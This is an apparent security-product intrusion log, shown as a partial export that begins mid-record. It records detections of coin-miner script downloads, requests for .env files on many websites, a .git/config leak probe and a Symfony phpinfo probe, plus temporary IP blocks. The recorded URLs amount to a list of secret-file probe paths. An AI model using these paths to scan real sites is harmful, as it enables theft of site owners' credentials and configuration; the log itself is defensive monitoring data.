CRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyNzA1Miwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxMTUxNTk0MCwidWlkIjoiNzk0MEZFMDEtRkZFMC1GMUYwLUI5RUItRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d20c	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770015334.9536840915679931640625			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003fc	01dc94113b587b91	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94111612d6d4	01dc94111612d6d4	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxNjEyOTM3Qy05NDExLTExRjAtOTRCOC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000087da	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://nesenmitsu.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040b	01dc941141ffa340	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94111d35dece	01dc94111d35dece	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxRDMyOTAyRi05NDExLTExRjAtODlCNS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000073ed	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.vinhhungoldtownhotel.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fc	01dc94118155685a	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94115afe21a0	01dc94115afe21a0	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI1QUZBRDMyOS05NDExLTExRjAtQjM5Ri0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000004e1	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://nuochoa95.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000405	01dc94118b4e9412	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc9411655d70e7	01dc9411655d70e7	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI2NTVBREZEOC05NDExLTExRjAtQjdGOS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000063fc	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://thptbacyenthanh.edu.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000403	01dc94118b4e9412	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc941167258f82	01dc941167258f82	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI2NzI0Q0IyNi05NDExLTExRjAtQjZCOS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00005fb7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://xylanhthuyluc.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000403	01dc94119556e556	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94116fc371b4	01dc94116fc371b4	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI2RkMwMjRBQS05NDExLTExRjAtQUE1NS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000ca4f	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://tieunidieuhan.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000223	01dc9411a605f5fc	000000d3	0000000f	164a8367	b02f72a7	00000001	00000000	00000000	01dc941180d1bca2	01dc941180d1bca2	00000001	00000000	Active Response that started at 2/2/2026 1:49:40 PM is disengaged. The traffic from IP address 167.114.47.176 was blocked for 600 second(s).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003f9	01dc9411c0a88af6	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94119c906287	01dc94119c906287	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI5QzhGOEUyNy05NDExLTExRjAtOUYyMS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00004929	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000402	01dc9411ef4bfda5	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc9411ca3c908e	01dc9411ca3c908e	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJDQTM5NTlDQS05NDExLTExRjAtODA0OC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000004c7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://nipponhitech.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000222	01dc9412713468d3	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94124c78948f	01dc94124c78948f	00000001	00000000	Active Response that started at 2/2/2026 1:55:22 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003e9	01dc941407c5783a	000000ce	0000000f	164a8367	0693ecc0	00000002	00000002	00000001	01dc9413e1c35007	01dc9413e1c35007	00000001	00000164	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFMUJGRkY5RS05NDEzLTExRjAtQTBFNC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMwNzExLCJuYW1lIjoiQXVkaXQ6IC5naXQgRGlyZWN0b3J5IEluZm9ybWF0aW9uIExlYWsiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000077f7	00010000	00000002	00000002	0000b36e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://tieunidieuhan.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000402	01dc9414ed84235f	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414c6f1b9a2	01dc9414c6f1b9a2	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJDNkYwRTBBMi05NDE0LTExRjAtODMwNS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000aa9a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000409	01dc9414f0d8e5bc	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414cb4fcc2e	01dc9414cb4fcc2e	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJDQjRGMDdDMS05NDE0LTExRjAtODJEQS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a3c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/portal/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc9414f426ee5b	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414cdd3b07a	01dc9414cf4ecc25	00000002	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJDRjRDNEExMC05NDE0LTExRjAtODQ4Ni0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a4c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/api/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc9414fe2e3741	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414d481c19f	01dc9414d88c848c	00000002	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJEODhCQzAxQi05NDE0LTExRjAtQjg2Ny0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	000084c6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/app/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc94150b8b7015	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414dcc28776	01dc9414e48af7f4	00000003	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFNDg5NjVFMS05NDE0LTExRjAtQkY2Ri0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000da64	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/dev/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc94151240048c	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414ec58af33	01dc9414ec58af33	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFQzU3REFCRC05NDE0LTExRjAtQjBCNS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a06	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/new/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040e	01dc94151240048c	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414ed4f63c3	01dc9414ed4f63c3	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFRDRDQ0JGQS05NDE0LTExRjAtQjMxQi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/new/.env.staging			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000417	01dc94151240048c	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414edeff9c1	01dc9414edeff9c1	00000001	00000174	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFREVDRDFBQS05NDE0LTExRjAtQjM1Ri0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMzMjY5LCJuYW1lIjoiQXVkaXQ6IFBvc3NpYmxlIE1pc2NvbmZpZ3VyZWQgU3ltZm9ueSBBcHBsaWNhdGlvbiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000081f5	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://www.shopapplevn.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040a	01dc9415159494d5	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414efdafa24	01dc9414efdafa24	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFRkRBMzVBQi05NDE0LTExRjAtQjIyRS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040a	01dc941518e102bc	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414f3a827b6	01dc9414f3a827b6	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGM0E3QzY3Qy05NDE0LTExRjAtQjVDNi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040f	01dc94151f91029a	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414f91f8eae	01dc9414f91f8eae	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGOTFDQUIxQy05NDE0LTExRjAtQjYxMC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/node_modules/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040a	01dc941522e881c1	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414fcac44a8	01dc9414fcac44a8	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGQ0E5MUNDQi05NDE0LTExRjAtQTk4RC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00009a0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
